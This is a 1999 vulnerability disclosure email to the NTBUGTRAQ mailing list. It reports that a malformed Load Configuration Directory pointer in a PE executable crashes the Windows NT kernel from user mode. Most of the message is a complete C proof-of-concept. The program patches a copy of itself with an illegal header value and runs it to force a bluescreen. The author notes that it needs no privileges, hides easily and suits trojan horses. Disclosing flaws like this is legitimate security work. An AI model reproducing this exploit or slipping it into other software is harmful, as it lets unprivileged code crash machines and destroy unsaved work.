Everhart, Glenn
From:	Jussi Lahdenniemi [jl@VVF.FI]
Sent:	Wednesday, March 31, 1999 4:57 AM
To:	NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject:	BSOD in user mode
Hello,

the following program causes NT kernel to bugcheck. It does not need any
special privileges and can be hidden easily. Mainly usable in trojan
horses, probably.

Anyhow, the NT's PE loader seems to crash when the Load Configuration
Directory pointer in the executable header is illegal. Tested with NT4/SP4
and NT5 beta 2. Windows 95 and 98 do not mind.


#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>

void main( void )
{
    char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
    HANDLE h;
    DWORD x, foo;
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;

    if( MessageBox( NULL, "Do you want to crash your NT?", "Crash it?",
        MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
    {
        return;
    }

    GetModuleFileName( NULL, me, 256 );
    GetTempPath( 256, tpath );
    GetTempFileName( tpath, "foo", 0, tname );

    CopyFile( me, tname, FALSE );
    h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, 0, NULL );
    SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
    ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
    x = 0xba6defdd;
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    CloseHandle( h );

    GetStartupInfo( &sui );
    CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL,
        NULL, &sui, &pi );
}


--
Jussi Lahdenniemi, Virtual Visions Finland                        jl@vvf.fi
Hermiankatu 6-8C                                        tel +358-50-3591405
33720 Tampere                                           fax  +358-3-3186100
Finland